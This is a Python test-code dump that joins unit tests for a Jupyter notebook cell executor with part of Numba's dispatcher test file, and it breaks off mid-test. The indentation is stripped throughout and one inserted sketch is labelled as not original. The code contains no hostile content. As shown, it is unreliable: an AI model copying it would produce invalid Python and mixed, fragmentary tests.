@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_deadline_exec_reply(self, executor, cell_mock, message_mock):
# exec_reply is never received, so we expect to hit the timeout.
async def get_msg(timeout):
await asyncio.sleep(timeout)
raise Empty
executor.kc.shell_channel.get_msg = get_msg
executor.timeout = 1
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks()
def test_deadline_iopub(self, executor, cell_mock, message_mock):
# The shell_channel will complete, so we expect only to hit the iopub timeout.
message_mock.side_effect = Empty()
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_eventual_deadline_iopub(self, executor, cell_mock, message_mock):
# Process a few messages before raising a timeout from iopub
def message_seq(messages):
yield from messages
while True:
yield Empty()
message_mock.side_effect = message_seq(list(message_mock.side_effect)[:-1])
executor.kc.shell_channel.get_msg = Mock(
return_value=make_async({'parent_header': {'msg_id': executor.parent_id}})
)
executor.raise_on_iopub_timeout = True
with pytest.raises(TimeoutError):
executor.execute_cell(cell_mock, 0)
assert message_mock.call_count >= 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{'msg_type': 'execute_input', 'header': {'msg_type': 'execute_input'}, 'content': {}}
)
def test_execute_input_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# One ignored execute_input, followed by an idle
assert message_mock.call_count == 2
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_stream_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout then stderr stream followed by an idle
assert message_mock.call_count == 3
# Ensure the output was captured
self.assertListEqual(
cell_mock.outputs,
[
{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'},
{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'},
],
)
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'execute_reply'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{'msg_type': 'clear_output', 'header': {'msg_type': 'clear_output'}, 'content': {}},
)
def test_clear_output_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Ensure the output was cleared
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
)
def test_clear_output_wait_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A stream, followed by a clear, and then an idle
assert message_mock.call_count == 3
# Should be true without another message to trigger the clear
self.assertTrue(executor.clear_before_next_output)
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stderr', 'text': 'bar'},
},
)
def test_clear_output_wait_then_message_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An stdout stream, followed by a wait clear, an stderr stream, and then an idle
assert message_mock.call_count == 4
# Should be false after the stderr message
assert not executor.clear_before_next_output
# Ensure the output wasn't cleared yet
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stderr', 'text': 'bar'}]
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'name': 'stdout', 'text': 'foo'},
},
{
'msg_type': 'clear_output',
'header': {'msg_type': 'clear_output'},
'content': {'wait': True},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
},
)
def test_clear_output_wait_then_update_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
        # A stdout stream, followed by a wait clear, an update_display_data, and then an idle
assert message_mock.call_count == 4
        # Should still be true because update_display_data does not produce a new output
assert executor.clear_before_next_output
# Ensure the output wasn't cleared yet because update_display doesn't add outputs
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
'content': {'execution_count': 42},
}
)
def test_execution_count_message_ignored_on_override(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0, execution_count=21)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 21
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'stream',
'header': {'msg_type': 'stream'},
'content': {'execution_count': 42, 'name': 'stdout', 'text': 'foo'},
}
)
def test_execution_count_with_stream_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execution count followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should also consume the message stream
assert cell_mock.outputs == [{'output_type': 'stream', 'name': 'stdout', 'text': 'foo'}]
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {'comm_id': 'foobar', 'data': {'state': {'foo': 'bar'}}},
}
)
def test_widget_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message without buffer info followed by an idle
assert message_mock.call_count == 2
self.assertEqual(executor.widget_state, {'foobar': {'foo': 'bar'}})
# Buffers should still be empty
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
}
)
def test_widget_comm_buffer_message_single(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A comm message with buffer info followed by an idle
assert message_mock.call_count == 2
assert executor.widget_state == {'foobar': {'foo': 'bar'}}
assert executor.widget_buffers == {
'foobar': {('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']}}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo': 'bar'}, 'buffer_paths': [['path']]},
},
},
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'buffers': [b'123'],
'content': {
'comm_id': 'foobar',
'data': {'state': {'foo2': 'bar2'}, 'buffer_paths': [['path2']]},
},
},
)
def test_widget_comm_buffer_messages(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
        # Two comm messages with buffer info followed by an idle
assert message_mock.call_count == 3
assert executor.widget_state == {'foobar': {'foo': 'bar', 'foo2': 'bar2'}}
assert executor.widget_buffers == {
'foobar': {
('path',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path']},
('path2',): {'data': 'MTIz', 'encoding': 'base64', 'path': ['path2']},
}
}
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'comm',
'header': {'msg_type': 'comm'},
'content': {
'comm_id': 'foobar',
# No 'state'
'data': {'foo': 'bar'},
},
}
)
def test_unknown_comm_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An unknown comm message followed by an idle
assert message_mock.call_count == 2
# Widget states should be empty as the message has the wrong shape
assert not executor.widget_state
assert not executor.widget_buffers
# Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'execute_result',
'header': {'msg_type': 'execute_result'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
},
}
)
def test_execute_result_with_display_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An execute followed by an idle
assert message_mock.call_count == 2
assert cell_mock.execution_count == 42
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'execute_result',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
'execution_count': 42,
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
}
)
def test_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an idle
assert message_mock.call_count == 2
# Should generate an associated message
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar_other'},
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
},
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_display_data_same_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
        # Three display messages followed by an idle
        assert message_mock.call_count == 4
        # The first output shares a display_id with the third message, so it is
        # updated in place to the third message's content; the second and third
        # outputs are appended as received
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo_other': 'metabar_other'},
'data': {'foo': 'bar_other'},
},
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {'metadata': {'metafoo': 'metabar'}, 'data': {'foo': 'bar'}},
}
)
def test_update_display_data_without_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An update followed by an idle
assert message_mock.call_count == 2
# Display updates don't create any outputs
assert cell_mock.outputs == []
# No display id was provided
assert not executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar2'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_mismatch_id_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
        # A display, an update with a different display_id, then an idle
        assert message_mock.call_count == 3
        # The update targets a different display_id, so the display output is unchanged
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'display_data',
'header': {'msg_type': 'display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo': 'metabar'},
'data': {'foo': 'bar'},
},
},
{
'msg_type': 'update_display_data',
'header': {'msg_type': 'update_display_data'},
'content': {
'transient': {'display_id': 'foobar'},
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
},
},
)
def test_update_display_data_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# A display followed by an update then an idle
assert message_mock.call_count == 3
# Original output should be manipulated
assert cell_mock.outputs == [
{
'output_type': 'display_data',
'metadata': {'metafoo2': 'metabar2'},
'data': {'foo': 'bar2', 'baz': 'foobarbaz'},
}
]
assert 'foobar' in executor._display_id_map
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
}
)
def test_error_message(self, executor, cell_mock, message_mock):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
},
)
def test_error_and_error_status_messages(self, executor, cell_mock, message_mock):
with self.assertRaises(CellExecutionError):
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Cell outputs should still be copied
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
{
'msg_type': 'error',
'header': {'msg_type': 'error'},
'content': {'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']},
},
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# OK
'content': {'status': 'ok'},
},
)
def test_error_message_only(self, executor, cell_mock, message_mock):
# Should NOT raise
executor.execute_cell(cell_mock, 0)
# An error followed by an idle
assert message_mock.call_count == 2
# Should also consume the message stream
assert cell_mock.outputs == [
{'output_type': 'error', 'ename': 'foo', 'evalue': 'bar', 'traceback': ['Boom']}
]
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_allow_errors(self, executor, cell_mock, message_mock):
executor.allow_errors = True
# Should NOT raise
executor.execute_cell(cell_mock, 0)
        # Only the idle message (no iopub output messages were mocked)
        assert message_mock.call_count == 1
        # Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error', 'ename': 'NotImplementedError'},
}
)
def test_allow_error_names(self, executor, cell_mock, message_mock):
executor.allow_error_names = ['NotImplementedError']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
        # Only the idle message (no iopub output messages were mocked)
        assert message_mock.call_count == 1
        # Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_raises_exception_tag(self, executor, cell_mock, message_mock):
cell_mock.metadata['tags'] = ['raises-exception']
# Should NOT raise
executor.execute_cell(cell_mock, 0)
        # Only the idle message (no iopub output messages were mocked)
        assert message_mock.call_count == 1
        # Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_non_code_cell(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(source='"foo" = "bar"', metadata={}, cell_type='raw', outputs=[])
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
        # Non-code cells are skipped, so no messages are fetched
        assert message_mock.call_count == 0
        # Ensure no outputs were generated
assert cell_mock.outputs == []
@prepare_cell_mocks(
reply_msg={
'msg_type': 'execute_reply',
'header': {'msg_type': 'execute_reply'},
# ERROR
'content': {'status': 'error'},
}
)
def test_no_source(self, executor, cell_mock, message_mock):
cell_mock = NotebookNode(
# Stripped source is empty
source=' ',
metadata={},
cell_type='code',
outputs=[],
)
# Should NOT raise nor execute any code
executor.execute_cell(cell_mock, 0)
        # Cells with empty source are skipped, so no messages are fetched
        assert message_mock.call_count == 0
        # Ensure no outputs were generated
assert cell_mock.outputs == []
test_dispatcher.py
from __future__ import print_function, division, absolute_import
import errno
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import pickle
import weakref
from itertools import chain
try:
import jinja2
except ImportError:
jinja2 = None
try:
import pygments
except ImportError:
pygments = None
import numpy as np
from numba import unittest_support as unittest
from numba import utils, jit, generated_jit, types, typeof, errors
from numba import _dispatcher
from numba.compiler import compile_isolated
from numba.errors import NumbaWarning
from .support import (TestCase, tag, temp_directory, import_dynamic,
override_env_config, capture_cache_log, captured_stdout)
from numba.numpy_support import as_dtype
from numba.targets import codegen
from numba.caching import _UserWideCacheLocator
from numba.dispatcher import Dispatcher
from numba import parfor
from .test_linalg import needs_lapack
from .support import skip_parfors_unsupported
import llvmlite.binding as ll
_is_armv7l = platform.machine() == 'armv7l'
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
def dtype_generated_usecase(a, b, dtype=None):
if isinstance(dtype, (types.misc.NoneType, types.misc.Omitted)):
out_dtype = np.result_type(*(np.dtype(ary.dtype.name)
for ary in (a, b)))
elif isinstance(dtype, (types.DType, types.NumberClass)):
out_dtype = as_dtype(dtype)
else:
raise TypeError("Unhandled Type %s" % type(dtype))
def _fn(a, b, dtype=None):
return np.ones(a.shape, dtype=out_dtype)
return _fn
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per
# https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37 # noqa: E501
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
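# A minimal sketch (illustration only, not part of the original tests): the
# skip_bad_access decorator above is an ordinary unittest skip decorator, so it
# is applied to individual tests that rely on `chmod 500` actually blocking writes.
@skip_bad_access
def example_test_requiring_access_prevention():
    # hypothetical body: a real test would lock a cache directory with
    # os.chmod(path, 0o500) and assert that caching degrades gracefully
    pass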
class TestDispatcher(BaseTest):
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
        # __module__ must match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except Exception as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> "
r"\(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = ("Signature mismatch: %d argument types given, but function "
"takes 2 arguments")
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
        A failure to compute the fingerprint must not affect a nopython=False
        function. With nopython=True, on the other hand, a ValueError should
        be raised to report the fingerprint failure.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
def test_serialization(self):
"""
Test serialization of Dispatcher objects
"""
@jit(nopython=True)
def foo(x):
return x + 1
self.assertEqual(foo(1), 2)
# get serialization memo
memo = Dispatcher._memo
Dispatcher._recent.clear()
memo_size = len(memo)
# pickle foo and check memo size
serialized_foo = pickle.dumps(foo)
# increases the memo size
self.assertEqual(memo_size + 1, len(memo))
# unpickle
foo_rebuilt = pickle.loads(serialized_foo)
self.assertEqual(memo_size + 1, len(memo))
self.assertIs(foo, foo_rebuilt)
# do we get the same object even if we delete all the explicit
# references?
id_orig = id(foo_rebuilt)
del foo
del foo_rebuilt
self.assertEqual(memo_size + 1, len(memo))
new_foo = pickle.loads(serialized_foo)
self.assertEqual(id_orig, id(new_foo))
# now clear the recent cache
ref = weakref.ref(new_foo)
del new_foo
Dispatcher._recent.clear()
self.assertEqual(memo_size, len(memo))
# show that deserializing creates a new object
pickle.loads(serialized_foo)
self.assertIs(ref(), None)
@needs_lapack
@unittest.skipIf(_is_armv7l, "Unaligned loads unsupported")
def test_misaligned_array_dispatch(self):
# for context see issue #2937
def foo(a):
return np.linalg.matrix_power(a, 1)
jitfoo = jit(nopython=True)(foo)
n = 64
r = int(np.sqrt(n))
dt = np.int8
count = np.complex128().itemsize // dt().itemsize
tmp = np.arange(n * count + 1, dtype=dt)
        # create some arrays as the Cartesian product of:
# [F/C] x [aligned/misaligned]
C_contig_aligned = tmp[:-1].view(np.complex128).reshape(r, r)
